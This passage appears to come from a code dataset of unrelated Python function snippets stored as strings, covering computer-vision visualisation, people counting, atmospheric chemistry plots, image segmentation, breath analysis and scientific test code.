self.canvas.delete(shell.avatar)\n else:\n self.canvas.delete(\"bum\")\n self.canvas.delete(target.avatar)", "def visualize(self):\n colors = {'outline': (220, 220, 220),\n 'inlier': (0, 255, 0),\n 'outlier': (0, 0, 255),\n 'lines': (128, 220, 128)}\n # Create output image for visualization\n gap = 5\n h1, w1 = self.target.image.shape[:2]\n h2, w2 = self.image.shape[:2]\n vis = np.zeros((max(h1, h2), w1 + w2 + gap, 3), np.uint8)\n vis[:h1, :w1, :] = self.target.image\n w1 += gap\n vis[:h2, w1:w1+w2, :] = self.image\n \n # Draw the located object \n quad = np.float32(self.quad) + np.float32([w1, 0])\n self.draw(vis, colors['outline'], 2, quad)\n \n # draw point details\n inliers = [(x0, y0, x1 + w1, y1) for (x0, y0), (x1, y1) in self.inliers]\n outliers = [(x0, y0, x1 + w1, y1) for (x0, y0), (x1, y1) in self.outliers]\n if colors['outlier'] is not None: # draw x on each point\n r = 2 # radius\n thickness = 2\n for x0, y0, x1, y1 in outliers:\n cv2.line(vis, (x0 - r, y0 - r), (x0 + r, y0 + r), colors['outlier'], thickness)\n cv2.line(vis, (x0 + r, y0 - r), (x0 - r, y0 + r), colors['outlier'], thickness)\n cv2.line(vis, (x1 - r, y1 - r), (x1 + r, y1 + r), colors['outlier'], thickness)\n cv2.line(vis, (x1 + r, y1 - r), (x1 - r, y1 + r), colors['outlier'], thickness)\n if colors['lines'] is not None:\n for x0, y0, x1, y1 in inliers:\n cv2.line(vis, (x0, y0), (x1, y1), colors['lines'], 1)\n if colors['inlier'] is not None:\n for x0, y0, x1, y1 in inliers:\n cv2.circle(vis, (x0, y0), 2, colors['inlier'], -1)\n cv2.circle(vis, (x1, y1), 2, colors['inlier'], -1)\n return vis", "def track_object(self, frame_stamp, boxes, image, threshold=0, debug=False):\n people_in = self.DB.in_count()\n people_out = self.DB.out_count()\n\n objects = self.ct.update(boxes)\n if len(objects) > self.old_len:\n self.people = len(objects)\n\n # people_currently_in = self.DB.in_current()\n\n # loop over the tracked objects\n for (objectID, centroid) in objects.items():\n # check to see if a trackable object exists for the current\n # object ID\n to = self.trackableObjects.get(objectID, None)\n # if there is no existing trackable object, create one\n if to is None:\n to = TrackableObject(objectID, centroid)\n # otherwise, there is a trackable object so we can utilize it\n # to determine direction\n else:\n # check to see if the object has been counted or\n # if there is a change in its direction\n if not to.counted:\n to.counted = True\n if centroid[1] > threshold:\n to.start_point = \"down\"\n else:\n to.start_point = \"up\"\n\n print(f\"total people: {people_in-people_out}\")\n # the difference between the y-coordinate\n # of the current centroid & the mean\n # of previous centroids will tell us in\n # which direction the object is moving\n # (negative for 'up' & positive for 'down')\n y = [c[1] for c in to.centroids]\n direction = centroid[1] - np.mean(y)\n to.centroids.append(centroid)\n\n # Define the direction towards that the person\n # is walking to & update it on the obj instance\n if direction > 0 and centroid[1] > threshold:\n to.direction = \"in\"\n elif direction < 0 and centroid[1] < threshold:\n to.direction = \"out\"\n\n # If the new direction of the object is\n # different to its previous direction\n # update the people counter\n if to.direction != to.prev_direction:\n # A person has just walked in\n if to.direction == \"in\" and to.start_point != \"down\":\n people_in += 1\n to.prev_direction = \"in\"\n to.start_point = \"up\"\n # A person has just walked out\n elif to.direction == \"out\" and 
to.start_point != \"up\":\n to.prev_direction = \"out\"\n people_out += 1\n to.start_point = \"down\"\n\n # store the trackable object in our dictionary\n self.trackableObjects[objectID] = to\n\n # draw both the ID of the object and the centroid of the\n # object on the output frame\n # draw both the ID of the object and the centroid of the\n # object on the output frame\n if debug:\n text = \"ID {}\".format(objectID)\n cv2.putText(\n image,\n text,\n (centroid[0] - 10, centroid[1] - 10),\n cv2.FONT_HERSHEY_SIMPLEX,\n 0.5,\n (0, 255, 0),\n 2,\n )\n cv2.circle(image, (centroid[0], centroid[1]), 4, (0, 255, 0), -1)\n if people_out > people_in:\n people_out = people_in\n # update database information about total number\n # of people that entered/left the given space\n self.DB.update_out(people_out)\n self.DB.update_in(people_in)", "def GC_Profile_check(d0=datetime(2005,1,1),d1=datetime(2005,1,31), title=None):\n LatWol, LonWol = pp.__cities__['Wol']\n # Read GC output \n trop = GC_class.GC_sat(d0,d1, keys=['IJ-AVG-$_CH2O']+GC_class.__gc_tropcolumn_keys__)\n tropa= GC_class.GC_sat(d0,d1, keys=['IJ-AVG-$_CH2O']+GC_class.__gc_tropcolumn_keys__, run='new_emissions')\n # make sure pedges and pmids are created\n trop.add_pedges()\n dates=trop.dates\n \n # colours for trop and tropa\n c = 'r'\n ca= 'm'\n \n # grab wollongong square\n Woli, Wolj = util.lat_lon_index(LatWol,LonWol,trop.lats,trop.lons) # lat, lon indices\n GC_VMR = trop.hcho[:,Woli,Wolj,:]\n GCa_VMR = tropa.hcho[:,Woli,Wolj,:]\n \n GC_zmids=trop.zmids[:,Woli,Wolj,:]\n \n # check profile\n # TODO: split into summer and winter\n plt.figure(figsize=[10,10])\n #ax0=plt.subplot(1,2,1)\n for i,prof in enumerate([GC_VMR,GCa_VMR]):\n zmids = np.nanmean(GC_zmids,axis=0)/1000.0\n #pmids = np.nanmean(GC_pmids[0:20,:],axis=0)\n \n mean = np.nanmean(prof,axis=0)\n lq = np.nanpercentile(prof, 25, axis=0)\n uq = np.nanpercentile(prof, 75, axis=0)\n plt.fill_betweenx(zmids, lq, uq, alpha=0.5, color=[c,ca][i])\n plt.plot(mean,zmids,label=['VMR','VMR$^{\\\\alpha}$'][i],linewidth=2,color=[c,ca][i])\n #plt.yscale('log')\n plt.ylim([0, 40])\n plt.ylabel('altitude [km]')\n plt.legend(fontsize=20)\n plt.xlabel('HCHO [ppbv]')\n if title is None:\n title=\"Wollongong midday HCHO profile Jan 2005\"\n plt.title(title)\n pname_checkprof='Figs/check_GC_profile.png'\n plt.savefig(pname_checkprof)\n print(\"Saved \", pname_checkprof)", "def segmentation(\n img,\n img_path,\n results_folder,\n callback_context,\n crf_theta_slider_value,\n crf_mu_slider_value,\n rf_downsample_value,\n crf_downsample_factor,\n gt_prob,\n mask,#=None,\n n_sigmas,\n multichannel,#=True,\n intensity,#=True,\n edges,#=True,\n texture,#=True,\n sigma_min,#=0.5,\n sigma_max,#=16,\n):\n\n # #standardization using adjusted standard deviation\n img = standardize(img)\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Image standardized')\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n for ni in np.unique(mask[1:]):\n logging.info('examples provided of %i' % (ni))\n\n if len(np.unique(mask)[1:])==1:\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Only one class annotation provided, skipping RF and CRF and coding all pixels %i' % (np.unique(mask)[1:]))\n result2 = np.ones(mask.shape[:2])*np.unique(mask)[1:]\n result2 = result2.astype(np.uint8)\n\n else:\n\n result = do_classify(img,mask,n_sigmas,multichannel,intensity,edges,texture, sigma_min,sigma_max, rf_downsample_value)#,SAVE_RF) # 
n_estimators,rf_file,data_file,\n\n Worig = img.shape[0]\n result = filter_one_hot(result, 2*Worig)\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('One-hot labels filtered')\n\n if Worig>512:\n result = filter_one_hot_spatial(result, 2)\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('One-hot labels spatially filtered')\n else:\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('One-hot labels not spatially filtered because width < 512 pixels')\n\n result = result.astype('float')\n result[result==0] = np.nan\n result = inpaint_nans(result).astype('uint8')\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Spatially filtered values inpainted')\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('RF model applied with sigma range %f : %f' % (sigma_min,sigma_max))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n\n def tta_crf_int(img, result, k):\n k = int(k)\n result2, n = crf_refine(np.roll(result,k), np.roll(img,k), crf_theta_slider_value, crf_mu_slider_value, crf_downsample_factor, gt_prob)\n result2 = np.roll(result2, -k)\n if k==0:\n w=.1\n else:\n w = 1/np.sqrt(k)\n\n return result2, w,n\n\n num_tta = 5#10\n\n if (psutil.virtual_memory()[0]>10000000000) & (psutil.virtual_memory()[2]<50): #>10GB and <50% utilization\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('CRF parallel test-time augmentation')\n logging.info('Total RAM: %i' % (psutil.virtual_memory()[0]))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n w = Parallel(n_jobs=-2, verbose=0)(delayed(tta_crf_int)(img, result, k) for k in np.linspace(0,int(img.shape[0])/5,num_tta))\n R,W,n = zip(*w)\n else:\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('CRF serial test-time augmentation')\n logging.info('Total RAM: %i' % (psutil.virtual_memory()[0]))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n R = []; W = []; n = []\n for k in np.linspace(0,int(img.shape[0])/5,num_tta):\n r,w,nn = tta_crf_int(img, result, k)\n R.append(r); W.append(w); n.append(nn)\n\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('CRF model applied with %i test-time augmentations' % ( num_tta))\n\n result2 = np.round(np.average(np.dstack(R), axis=-1, weights = W)).astype('uint8')\n del R,W\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Weighted average applied to test-time augmented outputs')\n\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('CRF model applied with theta=%f and mu=%f' % ( crf_theta_slider_value, crf_mu_slider_value))\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n\n if ((n==1)):\n result2[result>0] = np.unique(result)\n\n result2 = result2.astype('float')\n result2[result2==0] = np.nan\n result2 = inpaint_nans(result2).astype('uint8')\n logging.info(datetime.now().strftime(\"%Y-%m-%d-%H-%M-%S\"))\n logging.info('Spatially filtered values inpainted')\n logging.info('percent RAM usage: %f' % (psutil.virtual_memory()[2]))\n\n return result2", "def breath_analyze(self, offset=0, th=10):\n # breath part\n breath_gd = np.gradient(gf(self.breath_list, 10))\n breath_gd[breath_gd > 0] = 1\n breath_gd[breath_gd < 0] = 0\n breath_pulse = breath_gd[:-1]-np.roll(breath_gd, -1)[:-1]\n breath_in = argrelextrema(breath_pulse, np.less, order=10)[0]#+offset\n 
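# breath-out onsets are the local maxima of the same pulse signal, mirroring the breath-in minima above\n 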
breath_out = argrelextrema(breath_pulse, np.greater, order=10)[0]#+offset\n self.breath = np.sort(np.hstack([breath_in, breath_out, len(self.breath_list)-1]))\n \n if self.breath[0] == breath_in[0]:\n self.btype = 'in'\n else:\n self.btype = 'out' \n\n b_in = []\n b_out = []\n delidx = []\n\n if len(self.breath) != 0: \n for i, j in zip(self.breath[:-1], self.breath[1:]):\n breath_diff = abs(self.breath_list[j]-self.breath_list[i])\n if abs(breath_diff) > 3000: # really breath in/out\n if abs(breath_diff) < 30000: # not deep breath\n if breath_diff > 0: # breath out\n print('breath out from frame '+str(i)+' to frame '+str(j)\n +' <== breath not deep enough')\n b_out.append(j-i)\n self.ngframe.append(i)\n else: # breath in\n print('breath in from frame '+str(i)+' to frame '+str(j)\n +' <== breath not deep enough')\n b_in.append(j-i)\n else: \n if breath_diff > 0: # breath out\n print('breath out from frame '+str(i)+' to frame '+str(j))\n b_out.append(j-i)\n else: # breath in\n print('breath in from frame '+str(i)+' to frame '+str(j))\n b_in.append(j-i)\n else:\n delidx.append(np.argwhere(self.breath==j)[0][0])\n self.breath = np.delete(self.breath, np.array(delidx))\n\n print('\\naverage breath out freq is: '+str(np.round(30./np.mean(b_out), 2))+' Hz')\n print('\\naverage breath in freq is: '+str(np.round(30./np.mean(b_in), 2))+' Hz')\n else:\n raise ImportError('Doing too fast !! please redo again !!')", "def skin_detection(img):\n for index_line, line in enumerate(img):\n for index_pixel, pixel in enumerate(line):\n if pixel[2] > 95 and pixel[1] > 40 and pixel[0] > 20 and max(pixel) - min(pixel) > 15 \\\n and abs(pixel[2] - pixel[1]) > 15 and pixel[2] > pixel[0] and pixel[2] > pixel[1] \\\n and index_pixel > len(line) / 2:\n # img[index_line][index_pixel] = (255, 255, 255)\n pass\n else:\n img[index_line][index_pixel] = (0, 0, 0)\n return img", "def magic_profile(self, parameter_s=''):\n if self.rc.profile:\n printpl('Current IPython profile: $self.rc.profile.')\n else:\n print 'No profile active.'", "def draw(self, prev_draw):\n # Std deviations for each parameter, the mean is the current location\n # strike = .375\n # length = 4.e3\n # width = 3.e3\n # depth = .1875\n # slip = .01\n # rake = .25\n # dip = .0875\n # longitude = .025\n # latitude = .01875\n strike_std = 5. # strike_std = 1.\n length_std = 5.e3 # length_std = 2.e4\n width_std = 2.e3 # width_std = 1.e4\n depth_std = 1.e3 # depth_std = 2.e3\n slip_std = 0.5 # slip_std = 0.5\n rake_std = 0.5 # rake_std = 0.5\n dip_std = 0.1 # dip_std = 0.1\n longitude_std = 0.15 # longitude_std = .025\n latitude_std = 0.15 # latitude_std = .025\n mean = np.zeros(9)\n # square for std => cov\n cov = np.diag(np.square([strike_std, length_std, width_std, depth_std, slip_std, rake_std,\n dip_std, longitude_std, latitude_std]))\n\n cov *= 0.25;\n\n # random draw from normal distribution\n e = stats.multivariate_normal(mean, cov).rvs()\n\n # does sample update normally\n print(\"Random walk difference:\", e)\n print(\"New draw:\", prev_draw + e)\n new_draw = prev_draw + e\n\n \"\"\"\n Here we make some fixed changes to the dip and depth according \n to a simple rule documented elsewhere. 
This fix will likely\n depreciate upon finishing proof of concept paper and work on 1852\n event.\n \"\"\"\n # doctor dip to 20 degrees as discussed\n new_draw[6] = 20\n # doctor depth according to adhoc fix\n new_draw[3] = self.doctored_depth_1852_adhoc(new_draw[7], new_draw[8], new_draw[6])\n\n # return appropriately doctored draw\n return new_draw", "def flagUntexturedObject(self, object):\n object.setShaderInput(\"texDisable\", 1, 1, 1, 1)", "def apply_decal_if_inside_border(picture, decal, point, polygon, h_inv, limit):\n if is_inside(point, polygon):\n decal_point = find_decal_point(h_inv, point, limit)\n picture.putpixel(point, decal.getpixel(decal_point))", "def _atexit_print_fn():\r\n to_sum = []\r\n for ps in _atexit_print_list:\r\n if ps.fct_callcount or ps.compile_time > 0:\r\n ps.summary(file=_atexit_print_file,\r\n n_ops_to_print=config.profiling.n_ops,\r\n n_apply_to_print=config.profiling.n_apply)\r\n if not isinstance(ps, ScanProfileStats):\r\n to_sum.append(ps)\r\n else:\r\n #TODO print the name if there is one!\r\n print 'Skipping empty Profile'\r\n if len(to_sum) > 1:\r\n # Make a global profile\r\n cum = copy.copy(to_sum[0])\r\n cum.message = \"Sum of all printed profiles at exit excluding Scan op profile.\"\r\n for ps in to_sum[1:]:\r\n for attr in [\"compile_time\", \"fct_call_time\", \"fct_callcount\",\r\n \"vm_call_time\", \"optimizer_time\", \"linker_time\",\r\n \"validate_time\"]:\r\n setattr(cum, attr, getattr(cum, attr) + getattr(ps, attr))\r\n\r\n #merge dictonary\r\n for attr in [\"apply_time\", \"apply_callcount\",\r\n \"apply_cimpl\", \"variable_shape\", \"variable_strides\"]:\r\n cum_attr = getattr(cum, attr)\r\n for key, val in getattr(ps, attr).iteritems():\r\n assert key not in cum_attr\r\n cum_attr[key] = val\r\n\r\n if cum.optimizer_profile and ps.optimizer_profile:\r\n merge = cum.optimizer_profile[0].merge_profile(\r\n cum.optimizer_profile[1],\r\n ps.optimizer_profile[1])\r\n cum.optimizer_profile = (cum.optimizer_profile[0], merge)\r\n else:\r\n cum.optimizer_profile = None\r\n\r\n cum.summary(file=_atexit_print_file,\r\n n_ops_to_print=config.profiling.n_ops,\r\n n_apply_to_print=config.profiling.n_apply)", "def draw(self):\n\n super().draw()\n\n if self.hit or self.miss:\n # Change colour depending on hit or miss\n fl_color(FL_RED if self.hit else FL_WHITE)\n fl_pie(self.x()+4, self.y()+4, self.w() - 8, self.h() - 8, 0.0, 360.0)", "def draw_mask(img, percentage_x=100, percentage_y=100, offset_x=0, offset_y=0, rotation=0, rectangle=True):\n ydim, xdim = img.shape\n mask = np.zeros((ydim, xdim))\n\n # Convert percentages to fractions\n offset_x = (xdim * offset_x/100)\n offset_y = (ydim * offset_y/100)\n percentage_x = percentage_x/100\n percentage_y = percentage_y/100\n\n if rectangle is False:\n x_rad = np.floor((img.shape[1]/2) * percentage_x)\n y_rad = np.floor((img.shape[0]/2) * percentage_y)\n\n x_center = img.shape[1]//2 + offset_x\n y_center = img.shape[0]//2 - offset_y\n\n\n [x, y] = draw.ellipse(y_center, x_center, y_rad, x_rad, shape = img.shape, rotation=rotation)\n\n else:\n ysub = ydim * (1 - percentage_y)\n y1 = max(ysub/2 - offset_y, 0)\n y2 = min(ydim - ysub/2 - offset_y, ydim)\n r_coords = np.array([y1, y1, y2, y2, y1])\n\n xsub = xdim * (1 - percentage_x)\n x1 = max(xsub/2 + offset_x,0)\n x2 = min(xdim - xsub/2 + offset_x, xdim)\n c_coords = np.array([x1, x2, x2, x1, x1])\n\n x, y = draw.polygon(r_coords, c_coords)\n\n mask[x, y] = 1\n\n return(mask)", "def 
ShowOneContour(index,all_images,all_pointing,thex0,they0,all_titles,object_name,all_expo,dir_top_img,all_filt,figname):\n    plt.figure(figsize=(15,6))\n    spec_index_min=100  # cut the left border\n    spec_index_max=1900 # cut the right border\n    star_halfwidth=70\n    \n    YMIN=-15\n    YMAX=15\n    \n    figfilename=os.path.join(dir_top_img,figname)   \n    \n    #center is approximately the one on the original raw image (may be changed)\n    #x0=int(all_pointing[index][0])\n    x0=int(thex0[index])\n    \n    \n    # Extract the image    \n    full_image=np.copy(all_images[index])\n    \n    # refine center in X,Y\n    star_region_X=full_image[:,x0-star_halfwidth:x0+star_halfwidth]\n    \n    profile_X=np.sum(star_region_X,axis=0)\n    profile_Y=np.sum(star_region_X,axis=1)\n\n    NX=profile_X.shape[0]\n    NY=profile_Y.shape[0]\n    \n    X_=np.arange(NX)\n    Y_=np.arange(NY)\n    \n    avX,sigX=weighted_avg_and_std(X_,profile_X**4) # raised to the 4th power on purpose (weights must be > 0)\n    avY,sigY=weighted_avg_and_std(Y_,profile_Y**4)\n    \n    x0=int(avX+x0-star_halfwidth)\n    \n    \n    # find the center in Y on the spectrum\n    yprofile=np.sum(full_image[:,spec_index_min:spec_index_max],axis=1)\n    y0=np.where(yprofile==yprofile.max())[0][0]\n\n    # cut the image vertically and normalise by exposure time\n    reduc_image=full_image[y0-20:y0+20,x0:spec_index_max]/all_expo[index] \n    reduc_image[:,0:100]=0  # erase central star\n    \n    X_Size_Pixels=np.arange(0,reduc_image.shape[1])\n    Y_Size_Pixels=np.arange(0,reduc_image.shape[0])\n    Transverse_Pixel_Size=Y_Size_Pixels-int(float(Y_Size_Pixels.shape[0])/2.)\n    \n    # calibration in wavelength\n    #grating_name=all_filt[index].replace('dia ','')\n    grating_name=get_disperser_filtname(all_filt[index])\n    \n    lambdas=Pixel_To_Lambdas(grating_name,X_Size_Pixels,all_pointing[index],True)\n    \n    #if grating_name=='Ron200':\n    #    holo = Hologram('Ron400',verbose=True)\n    #else:    \n    #    holo = Hologram(grating_name,verbose=True)\n    #lambdas=holo.grating_pixel_to_lambda(X_Size_Pixels,all_pointing[index])\n    #if grating_name=='Ron200':\n    #    lambdas=lambdas*2.\n    \n\n    X,Y=np.meshgrid(lambdas,Transverse_Pixel_Size)     \n    T=np.transpose(reduc_image)\n    \n    \n    plt.contourf(X, Y, reduc_image, 100, alpha=1., cmap='jet',origin='lower')\n    C = plt.contour(X, Y, reduc_image , 20, colors='black', linewidth=.5,origin='lower')\n    \n    \n    for line in LINES:\n        if line == O2 or line == HALPHA or line == HBETA or line == HGAMMA:\n            plt.plot([line['lambda'],line['lambda']],[YMIN,YMAX],'-',color='lime',lw=0.5)\n            plt.text(line['lambda'],YMAX-3,line['label'],verticalalignment='bottom', horizontalalignment='center',color='lime', fontweight='bold',fontsize=16)\n    \n    \n    \n    plt.axis([X.min(), X.max(), Y.min(), Y.max()]); plt.grid(True)\n    plt.title(all_titles[index])\n    plt.grid(color='white', ls='solid')\n    plt.text(200,-5.,all_filt[index],verticalalignment='bottom', horizontalalignment='center',color='yellow', fontweight='bold',fontsize=16)\n    plt.xlabel('$\\lambda$ (nm)')\n    plt.ylabel('pixels')\n    plt.ylim(YMIN,YMAX)\n    plt.xlim(0.,1200.)\n    plt.savefig(figfilename)", "def test_profile_filtering(instr_task_workbench, instr_view):\n    add_profile(instr_task_workbench, 'fp5', 'Dummy.dumb.002')\n    p = instr_task_workbench.get_plugin('ecpy.instruments')\n    filtered = instr_view.filter_profiles(p._profiles)\n    assert 'fp5' not in filtered\n\n    add_profile(instr_task_workbench, 'fp6', 'Dummy.dumb.003')\n    p = instr_task_workbench.get_plugin('ecpy.instruments')\n    filtered = instr_view.filter_profiles(p._profiles)\n    assert 'fp6' in filtered", "def test_annotate_blank(self):\n        x_size = 500\n        y_size = 500\n\n        label = li.Label(\"Test 
Label\", (0.20, 0.20))\n test_im = li.ImageBlank(None, x_size, y_size)\n test_im.annotate(label)\n annotated_im = test_im.data\n\n # Ensure the shape is retained\n shape_expected = (y_size, x_size, 4)\n shape_test = annotated_im.shape\n self.assertEqual(\n shape_test, shape_expected, msg=\"shape not retained after annotation\"\n )\n\n # Test that there are darker text areas\n flattened = annotated_im[..., :3].mean(axis=-1)\n n_black_pixels = (flattened < 10).sum()\n\n self.assertGreater(n_black_pixels, 50, msg=\"Not enough black/text pixels\")\n self.assertLess(n_black_pixels, 5000, msg=\"Too many black/text pixels\")", "def coherenceProfiles(wfr, Fx = 1/3, Fy = 1/3):\n \n print(\"----Starting coherenceProfiles Function---\")\n \n Sx = int(Fx*wfr.params.Mesh.nx)\n Sy = int(Fy*wfr.params.Mesh.ny)\n print(\"Sampled area (pixels): {}\".format([Sx,Sy]))\n \n if Sx > 120 or Sy > 120:\n print(\"Error: Sampled area of wavefront is too large. Change Fx/Fy to a smaller value\")\n import sys\n sys.exit()\n \n start1 = time.time()\n cfr = getComplex(wfr)\n end1 = time.time()\n print('Time taken to convert to complex wavefield (s): {}'.format(end1 - start1))\n \n _x0 = 0 # These are in _pixel_ coordinates!!\n _y0 = 0\n _x1 = int(np.max(np.shape(cfr[:,0,0]))) # These are in _pixel_ coordinates!!\n _y1 = int(np.max(np.shape(cfr[0,:,0])))\n \n print(\"Nx (pixels): {}\".format(_x1))\n print(\"Ny (pixels): {}\".format(_y1))\n \n numx = _x1 - _x0 # number of points for line profile\n numy = _y1 - _y0\n midX = int(numx/2)\n midY = int(numy/2)\n \n print(\"midX & midY : {}\".format((midX,midY)))\n \n # # Fraction of wavefront to calculate coherence over\n # Fx = 1/3\n # Fy = 1/3\n \n ROI = ((int(midX-((Fx)*midX)),int(midY-((Fy)*midY))),\n (int(midX+((Fx)*midX)),int(midY+((Fy)*midY)))) \n \n lX = ROI[1][0]-ROI[0][0]\n lY = ROI[1][1]-ROI[0][1]\n \n print(\"Region of interest (pixels): {}\".format((lX,lY)))\n \n x0,y0 = ROI[0][0], ROI[0][1]\n x1,y1 = ROI[1][0], ROI[1][1]\n \n print(\"Region of interest again (x0,x1,y0,y1):{},{}\".format((x0,x1),(y0,y1)))\n \n A = cfr[x0:x1,y0:y1]\n \n print(\"Shape of sampled array A: {}\".format(np.shape(A)))\n \n \"\"\" Mutual Coherence Function \"\"\"\n start2 = time.time()\n Bx = np.array([A[:,int(lY/2)].conjugate() * a for a in A[:,int(lY/2)]])\n By = np.array([A[int(lX/2),:].conjugate() * a for a in A[int(lX/2),:]])\n end2 = time.time()\n print('Time taken to calculate coherence (s): {}'.format(end2 - start2))\n \n print(\"Shape of Bx: {}\".format(np.shape(Bx)))\n print(\"Shape of By: {}\".format(np.shape(By)))\n \n \n Dx = Fx*wfr.params.Mesh.xMax - Fx*wfr.params.Mesh.xMin\n Dy = Fy*wfr.params.Mesh.yMax - Fy*wfr.params.Mesh.yMin\n \n \"\"\" Creating array of custom tick markers for plotting \"\"\"\n tickAx = [round_sig(-Dx*1e6/2),round_sig(-Dx*1e6/4),0,round_sig(Dx*1e6/4),round_sig(Dx*1e6/2)]\n tickAy = [round_sig(Dy*1e6/2),round_sig(Dy*1e6/4),0,round_sig(-Dy*1e6/4),round_sig(-Dy*1e6/2)]\n \n # print(\"Array of horizontal markers: {}\".format(tickAx))\n # print(\"Array of vertical markers: {}\".format(tickAy))\n \n plt.imshow(abs(Bx))\n plt.title(\"(x0-x1)\")\n plt.xticks(np.arange(0,lX+1,lX/4),tickAx)\n plt.xlabel(\"x1-x0 [\\u03bcm]\")#\"(\\u03bcm)\")\n plt.yticks(np.arange(0,lY+1,lY/4),tickAy)\n plt.ylabel(\"x1-x0 [\\u03bcm]\")#\"(\\u03bcm)\")\n plt.colorbar()\n plt.show() \n \n plt.imshow(abs(By))\n plt.title(\"(y0-y1)\")\n plt.xticks(np.arange(0,lX+1,lX/4),tickAx)\n plt.xlabel(\"y1-y0 [\\u03bcm]\")#\"(\\u03bcm)\")\n plt.yticks(np.arange(0,lY+1,lY/4),tickAy)\n 
plt.ylabel(\"y1-y0 [\\u03bcm]\")#\"(\\u03bcm)\")\n plt.colorbar()\n plt.show()\n\n \n # Cx = abs(Bx.mean(0))\n # Cy = abs(By.mean(0))\n \n # plt.imshow(Cx)#,vmin=np.min(C),vmax=np.max(C))\n # plt.title(\"Degree of Coherence (Horizontal) (mean)\")\n # plt.colorbar()\n # plt.show() \n \n # plt.imshow(Cy)#,vmin=np.min(C),vmax=np.max(C))\n # plt.title(\"Degree of Coherence (Horizontal) (mean)\")\n # plt.colorbar()\n # plt.show() \n \n # \"\"\" Normalised Degree of Coherence \"\"\"\n # U = (abs(B.mean(0))/(abs(A.conjugate()*A)))", "def plot_profiles(snap, profs, dust_species_to_plot, debug=False):\n print('Plotting profiles...')\n\n units = {\n 'position': 'au',\n 'gas_velocity_radial_analytical': 'dimensionless',\n 'dust_velocity_radial_analytical': 'dimensionless',\n 'velocity_radial_numerical': 'dimensionless',\n }\n p = profs['gas'][0]\n\n if debug:\n num_dust = snap.num_dust_species\n ax = p.plot(x='radius', y=['velocity_pressure', 'velocity_visc'], units=units)\n y = ['gas_velocity_radial']\n y += [f'dust_velocity_radial_{idx+1:03}' for idx in range(num_dust)]\n ax = p.plot(x='radius', y=y, units=units)\n ax.legend().remove()\n\n fig, ax = plt.subplots()\n\n # Plot \"analytical\" radial drift velocity / velocity pressure component\n p.plot(\n x='radius',\n y='gas_velocity_radial_analytical',\n units=units,\n color='black',\n label='',\n ax=ax,\n )\n y = [f'dust_velocity_radial_analytical_{idx+1:03}' for idx in dust_species_to_plot]\n p.plot(x='radius', y=y, units=units, label='', ax=ax)\n colors = [line.get_color() for line in ax.lines[1:]]\n\n # Plot \"numerical\" radial drift velocity / velocity pressure component\n p.plot(\n x='radius',\n y='velocity_radial_numerical',\n units=units,\n color='black',\n linestyle='',\n marker='o',\n markersize=4,\n fillstyle='none',\n label='gas',\n std='shading',\n ax=ax,\n )\n profs_to_plot = [\n prof for idx, prof in enumerate(profs['dust']) if idx in dust_species_to_plot\n ]\n for species, prof, color in zip(dust_species_to_plot, profs_to_plot, colors):\n label = f'{snap.properties[\"grain_size\"][species].to(\"cm\"):.1f~P}'\n prof.plot(\n x='radius',\n y='velocity_radial_numerical',\n units=units,\n color=color,\n linestyle='',\n marker='o',\n markersize=4,\n fillstyle='none',\n label=label,\n std='shading',\n ax=ax,\n )\n\n ax.set_ylabel(r'$v_R / |v_P|$')\n ax.grid()\n\n textstr = f't = {snap.properties[\"time\"].to(\"years\").m:.0f} years'\n bbox = dict(boxstyle='round', facecolor='white', edgecolor='grey', alpha=0.8)\n ax.text(\n 0.97,\n 0.97,\n textstr,\n transform=ax.transAxes,\n horizontalalignment='right',\n verticalalignment='top',\n bbox=bbox,\n )\n ax.legend(framealpha=0.8, edgecolor='grey')\n\n return ax", "def test_profile_with_nans():\n pressure = np.array([1001, 1000, 997, 977.9, 977, 957, 937.8, 925, 906, 899.3, 887, 862.5,\n 854, 850, 800, 793.9, 785, 777, 771, 762, 731.8, 726, 703, 700, 655,\n 630, 621.2, 602, 570.7, 548, 546.8, 539, 513, 511, 485, 481, 468,\n 448, 439, 424, 420, 412]) * units.hPa\n temperature = np.array([-22.5, -22.7, -23.1, np.nan, -24.5, -25.1, np.nan, -24.5, -23.9,\n np.nan, -24.7, np.nan, -21.3, -21.3, -22.7, np.nan, -20.7, -16.3,\n -15.5, np.nan, np.nan, -15.3, np.nan, -17.3, -20.9, -22.5,\n np.nan, -25.5, np.nan, -31.5, np.nan, -31.5, -34.1, -34.3,\n -37.3, -37.7, -39.5, -42.1, -43.1, -45.1, -45.7, -46.7]\n ) * units.degC\n dewpoint = np.array([-25.1, -26.1, -26.8, np.nan, -27.3, -28.2, np.nan, -27.2, -26.6,\n np.nan, -27.4, np.nan, -23.5, -23.5, -25.1, np.nan, -22.9, -17.8,\n -16.6, np.nan, np.nan, -16.4, 
